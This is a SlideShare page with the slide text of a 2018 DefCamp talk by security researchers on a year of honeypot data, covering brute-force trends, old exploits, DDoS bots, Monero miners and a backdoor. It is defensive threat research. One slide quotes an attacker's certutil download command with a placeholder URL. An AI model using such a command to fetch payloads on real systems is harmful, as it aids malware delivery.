Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
MIRAI TO MONERO – ONE YEAR’S
WORTH OF HONEYPOT DATA
Adrian ...
2© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
WHO ARE WE?
• Senior security researchers
• Love exploits, ...
3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
WHO ARE WE?
4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
HONEY NETWORK
Honeypot distribution
5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
WHAT ARE ATTACKERS LIKE?
6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ATTACKERS ARE...
• Persistent
• Not very fashionable
• Reso...
7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
HONEY NETWORK
Distribution by targets
8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
• TELNET
• SSH
• SMTP
• POP3
• IMA...
9© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
• Note: one “event” is per-hour ag...
10© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
Unique IP Addresses
0
5000
10000
...
11© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
Target Prevalence
Telnet-Brutefor...
12© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
Bruteforce Stats - October 2018
T...
13© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT - CSI
• Not that many hits (aprox 6000)
• VMs, ...
14© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
NOT VERY FASHIONABLE
• CVE-2013-6117
Dahua DVRs
15© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
NOT VERY FASHIONABLE
• Yes, it's the WannaCry one...
ETERN...
16© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
NOT VERY FASHIONABLE
• It’s all fun and games
• Until you ...
17© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
RESOURCEFUL
XAttacker
18© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
RESOURCEFUL
XAttacker
19© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
RESOURCEFUL
XAttacker
20© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
RESOURCEFUL
XAttacker
0
200
400
600
800
1000
1200
January-...
21© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
OPPORTUNISTIC
Drupalgeddon[23]
22© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ALL OF THESE
DLink – multiple vulnerabilities
23© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ALL OF THESE
MySQL
24© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Evolution of number of events
Mirai & Clon...
25© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Evolution of number of events
Mirai & Clon...
26© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Fortinet blogged: https://www.fortinet.com...
27© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Antique bot, Windows, possibly modified
• ...
28© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Multiple documented families
• DDoSTF via ...
29© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - COIN MINERS
• Seen via multiple exploits
• Monero...
30© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - COIN MINERS
• Notice something strange?
certutil....
31© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - COIN MINERS
• Technique described previously, not...
32© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - BACKDOORS
• Main source – ETERNALBLUE
• (allegedl...
33© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN – BACKDOORS WITH A TWIST
• One sample URL downloade...
34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERV...
35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERV...
36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERV...
37© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
Upcoming SlideShare
Loading in …5
×

From Mirai to Monero – One Year’s Worth of Honeypot Data

35 views

Published on

Adrian Hada and Mihai Vasilescu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.

The slides and other presentations can be found on https://def.camp/archive

Published in: Technology
  • Be the first to comment

  • Be the first to like this

From Mirai to Monero – One Year’s Worth of Honeypot Data

  1. 1. 1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | MIRAI TO MONERO – ONE YEAR’S WORTH OF HONEYPOT DATA Adrian Hada, Senior Security Researcher Mihai Vasilescu, Senior Security Researcher
  2. 2. 2© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHO ARE WE? • Senior security researchers • Love exploits, malware, honeypots and tinkering • Good guys • Hope for unemployment because #securityissolved • @ht_adrian & @me_high4eva
  3. 3. 3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHO ARE WE?
  4. 4. 4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | HONEY NETWORK Honeypot distribution
  5. 5. 5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHAT ARE ATTACKERS LIKE?
  6. 6. 6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACKERS ARE... • Persistent • Not very fashionable • Resourceful • Opportunistic • All the above • Driven
  7. 7. 7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | HONEY NETWORK Distribution by targets
  8. 8. 8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE • TELNET • SSH • SMTP • POP3 • IMAP • VNC • HTTP • Wordpress • Joomla • PHPMyAdmin • And the list goes on Protocols
  9. 9. 9© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE • Note: one “event” is per-hour aggregation Events 0 50000 100000 150000 200000 250000 January-18 February-18 March-18 April-18 May-18 June-18 July-18 August-18 September-18 Bucketed Brute Force Events
  10. 10. 10© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE Unique IP Addresses 0 5000 10000 15000 20000 25000 30000 35000 40000 January-18 February-18 March-18 April-18 May-18 June-18 July-18 August-18 September-18 Unique IP Addresses
  11. 11. 11© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE Target Prevalence Telnet-Bruteforce 53% SSH-Bruteforce 38% MySQL/MSSQL Bruteforce 7% SMTP Authentication Bruteforce 2% Generic PHP Application Login Bruteforce 0% RDP-Bruteforce 0% POP3 Bruteforce 0% VNC Bruteforce 0% XMLRPC sys.multicall Bruteforce Authentication 0% Top 10 Bruteforce Targets Telnet-Bruteforce SSH-Bruteforce MySQL/MSSQL Bruteforce SMTP Authentication Bruteforce Generic PHP Application Login Bruteforce RDP-Bruteforce POP3 Bruteforce VNC Bruteforce XMLRPC sys.multicall Bruteforce Authentication
  12. 12. 12© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE Bruteforce Stats - October 2018 Telnet-Bruteforce SSH-Bruteforce MySQL/MSSQL Bruteforce VNC Bruteforce Generic PHP Application Login Bruteforce RDP-Bruteforce POP3 Bruteforce XMLRPC sys.multicall Bruteforce Authentication
  13. 13. 13© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT - CSI • Not that many hits (aprox 6000) • VMs, not Cisco hardware Cisco Smart Install
  14. 14. 14© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NOT VERY FASHIONABLE • CVE-2013-6117 Dahua DVRs
  15. 15. 15© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NOT VERY FASHIONABLE • Yes, it's the WannaCry one... ETERNALBLUE
  16. 16. 16© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NOT VERY FASHIONABLE • It’s all fun and games • Until you expose a DNS “open resolver” NTP & DNS
  17. 17. 17© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | RESOURCEFUL XAttacker
  18. 18. 18© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | RESOURCEFUL XAttacker
  19. 19. 19© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | RESOURCEFUL XAttacker
  20. 20. 20© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | RESOURCEFUL XAttacker 0 200 400 600 800 1000 1200 January-18 February-18 March-18 April-18 May-18 June-18 July-18 August-18 September-18 XAttacker Bucketed Hits
  21. 21. 21© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | OPPORTUNISTIC Drupalgeddon[23]
  22. 22. 22© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ALL OF THESE DLink – multiple vulnerabilities
  23. 23. 23© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ALL OF THESE MySQL
  24. 24. 24© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Evolution of number of events Mirai & Clones
  25. 25. 25© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Evolution of number of events Mirai & Clones
  26. 26. 26© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Fortinet blogged: https://www.fortinet.com/blog/threat-research/ddos-for-hire-service-powered-by- bushido-botnet-.html Mirai & Clones
  27. 27. 27© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Antique bot, Windows, possibly modified • Seen via MySQL and ETERNALBLUE Nitol
  28. 28. 28© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Multiple documented families • DDoSTF via MySQL (reported by MalwareMustDie in 2016) • DoFloo DDoS Trojan – validate using CC decryptor from https://github.com/felicitychou/RATConf- DecryptScript Other Bots
  29. 29. 29© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - COIN MINERS • Seen via multiple exploits • Monero is the go-to currency • Reuse open mining tools • Example from ETERNALBLUE
  30. 30. 30© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - COIN MINERS • Notice something strange? certutil.exe –urlcache –split –f <url>
  31. 31. 31© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - COIN MINERS • Technique described previously, not new • Xavier Mertens’ ISC diary: https://isc.sans.edu/diary/rss/23517
  32. 32. 32© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - BACKDOORS • Main source – ETERNALBLUE • (allegedly) Chinese backdoor - https://artemonsecurity.blogspot.com/2012/12/zegost- analysis-of-chinese-backdoor.html • DLL file contains download URL for executable • Payload conf can be decrypted via RADconf-DecryptScript Zegost Trojan
  33. 33. 33© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN – BACKDOORS WITH A TWIST • One sample URL downloaded 8.5M of data.. • Apparently, Themida-packed binary • Sandbox it! Zegost Trojan
  34. 34. 34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | “IT’S 2019. THE INTERNET IS STILL A DANGEROUS PLACE. WHETHER WINDOWS OR LINUX. OR MAC.” Us,2018
  35. 35. 35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
  36. 36. 36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | “ATTACKERS ARE A LOT LIKE US. IF THEY CAN BREAK THINGS, WE CAN PROTECT THEM.” Us,2018
  37. 37. 37© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |

×